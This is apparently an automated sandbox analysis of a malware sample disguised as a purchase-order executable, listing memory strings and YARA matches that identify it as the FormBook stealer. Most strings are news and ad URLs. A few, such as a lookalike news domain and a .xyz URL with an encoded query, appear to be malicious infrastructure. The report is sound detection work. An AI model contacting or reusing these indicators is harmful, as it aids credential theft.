Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: explorer.exe, 0000000C.00000000.669438357.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/CPS0v
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
Source: PO45937008ADENGY.exe, 00000000.00000002.710719071.0000000002E65000.00000004.00000001.sdmp String found in binary or memory: https://myliverpoolnews.cf
Source: PO45937008ADENGY.exe, 00000000.00000002.710719071.0000000002E65000.00000004.00000001.sdmp String found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://s2-prod.liverpool.com/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://s2-prod.mirror.co.uk/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://scripts.webcontentassessor.com/scripts/5550ca64f1c03fa16b2d1f2d6508b85a6de49bc25b57292ba9c7c
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: wlanext.exe, 00000011.00000002.915820348.0000000003FB2000.00000004.00000001.sdmp String found in binary or memory: https://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJI
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.c
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/curtis-user
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-user-jurgen-klopp-19941053
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/schedule/
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: https://www.liverpool.com/search/
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
